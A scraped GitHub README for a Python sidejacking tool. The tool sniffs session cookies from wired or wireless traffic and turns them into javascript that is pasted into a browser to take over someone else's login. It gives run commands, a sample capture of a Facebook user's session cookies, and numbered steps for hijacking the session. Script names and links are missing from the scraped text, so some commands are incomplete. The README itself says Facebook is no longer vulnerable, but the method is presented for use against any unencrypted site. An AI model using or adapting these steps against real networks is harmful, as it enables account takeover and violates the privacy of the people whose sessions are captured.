Skip to content
Switch branches/tags

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time

A Simple sidejacking tool, using javascript cookie injection.

This software sniffs any interface for cookies, and generates javascript code that can be injected into any browser, by pasting it into the URL bar.

It comes accompanied by a script:, that is able to use the airport sniff feature present in OS X 10.6+, allowing the wireless device to be put in monitor mode. We are, thus, able to retrieve any cookie sent on the chosen wireless channel.


To run the cookieJsInjection open a shell (e.g., bash) and execute the following command (cookieJsInjection requires scapy to run -


Where IFACE represents the network interface you wish to sniff on (e.g. eth0, wlan0, etc).

If you supply the flag -facebook, it will only output facebook cookies, keeping track of the profiles captured in the session, and eliminating duplicate entries:

./ IFACE -facebook

If you wish to run cookieJsInjection on a wireless device, and you are currently running OS X 10.6+, use

hybrid:py-cookieJsInjection diogomonica$ sudo python 9 -facebook
[*] Starting scan on channel 9
Capturing 802.11 frames on en1.
# Found cookie for facebook user XXXXXXXX:
c_user = XXXXXXXXX
presence = DJ294237494BchADhA_2256.channel_22BsubA_5b1_5dBF294237772227WMblcMshfPBbloMbvtMctP294232437BsbPBtA_5b_5dBfAnullBuctMsA0QBblADacA69V294236729Z292BlcPBuoAD1454092337ADolA-1BflA_5b_5dBexpP294237495196QB1259338588ADolA-1BflA_5b_5dBexpZ295237551044QQBalAD1606900057ADiA0QQQQ
xs = 24e156ef2ddf6d6911422b0a9825825f
datr = 4VToPPIw60lKSa3qrFSFrlm1
lu = ZBj64Z92UpiasQNnWbkzW32w
sct = 1273830123
x-referer =
[*] Javascript Injection code:

Remember to select the appropriate channel (in the example above, channel 9 was used).

Example of Facebook sidejacking

UPDATE: This tool no longer works to sniff Facebook cookies since facebook now uses TLS for all of their traffic and HSTS headers to prevent SSLStrip attacks.

1 - Run cookieJsInjection and wait for cookies to appear

glow:py-cookieJsInjection hiperion$ sudo python en1 -facebook

2 - Copy the javascript code (begining with javascript:).

3 - Open the browser in (make sure you are logged out of any accounts).

4 - Paste the javascript code into the URL bar (press enter)

5 - Go to


More information on sidejacking -


A python script that sniffs cookies from the network, and outputs Javascript code that can be used to inject the cookies into any browser.



No releases published


No packages published